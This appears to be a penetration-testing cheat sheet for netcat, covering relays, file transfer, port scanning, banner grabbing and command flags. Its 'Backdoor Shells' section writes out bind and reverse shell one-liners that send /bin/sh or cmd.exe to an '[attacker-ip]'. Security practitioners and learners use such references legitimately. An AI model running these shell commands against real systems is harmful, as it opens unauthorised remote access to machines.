1. Fundamentals
  1. nc [target-ip] [port]
    1. client to listener
  2. nc -lp [port]
    1. create listener
2. NetCat Relay on Windows
  1. c:\> cd c:\tmp
    1. create temp dir for the .bat file(s)
  2. c:\> echo nc [target-ip] [port] >relay.bat
  3. c:\> nc -l -p [localport] -e relay.bat
    1. Above will relay from NC listener to NC client
    2. relay packets from local port [localport] to NC client connected to [target-ip] on port [port]
  4. c:\> echo nc [target-ip] [port] >relay.bat
  5. c:\> nc [source-ip] [source-port] -e relay.bat
    1. Above will relay from NC client to NC client
    2. relay that routes packets from the connection to [source-ip] on [source-port] to a NC client connected to [target-ip] on [port]
  6. c:\> echo nc -l -p [local-port-2] >relay.bat
  7. c:\> nc -l -p [local-port-1] -e relay.bat
    1. relay from NC listener to NC listener
    2. create relay routing packets from any connection connected to [local-port-1] to any connection connected to [local-port-2]
3. Files push/pull
  1. # nc [target-ip] [port] <[infile]
    1. push a file
  2. # nc -l -w3 -p [local-port] >[outfile]
    1. pull a file that is being pushed (stdout redirected into [outfile]), close connection after 3 seconds
    2. time to wait can be adjusted
4. NetCat port scanner
  1. # nc -v -n -z -w1 [target-ip] [start-port]-[end-port]
    1. attempt connection on ports [start]-[end]
    2. run verbosely -v
    3. do not resolve names -n
    4. no sending of data -z
    5. wait for 1 second for connection -w1
    6. option: randomize ports -r
5. TCP Banner Grabber
  1. # echo "" | nc -v -n -w1 [target-ip] [start-port]-[end-port]
    1. send blank string to get banner
6. Backdoor Shells
  1. # nc -l -p [port] -e /bin/sh
    1. shell on Linux
  2. c:\> nc -l -p [port] -e cmd.exe
    1. shell on Windows
  3. # nc [attacker-ip] [port] -e /bin/sh
    1. reverse shell on Linux
  4. c:\> nc [attacker-ip] [port] -e cmd.exe
    1. reverse shell on Windows
7. NetCat Relays on Linux
  1. cd /tmp
  2. mknod backpipe p
    1. create FIFO called backpipe
  3. nc -l -p [local-port] 0<backpipe | nc [target-ip] [trgt-port] | tee backpipe
    1. relay from NC listener to NC client
    2. route packets from [local-port] to NC client connected to [target-ip] on [trgt-port]
  4. nc [source-ip] [src-port] 0<backpipe | nc [target-ip] [trgt-port] | tee backpipe
    1. relay from NC client to NC client
    2. route packets from connection on [source-ip] [src-port] to a NC client connected to [target-ip] [trgt-port]
  5. nc -l -p [local-port-1] 0<backpipe | nc -l -p [local-port-2] | tee backpipe
    1. relay from NC listener to NC listener
    2. route packets from any connection connected to port [local-port-1] to any connection connected to [local-port-2]
8. NetCat command flags
  1. nc -[options] [target-ip] [port/s]
    1. listen -l
    2. listen harder (persistent, start listening again after disconnect) -L
    3. UDP mode (default is TCP) -u
    4. local port -p
    5. execute program after connection -e
    6. no DNS lookup -n
    7. zero-data, do not send any data -z
    8. timeout for disconnect -w#
    9. verbose output -v
    10. very verbose -vv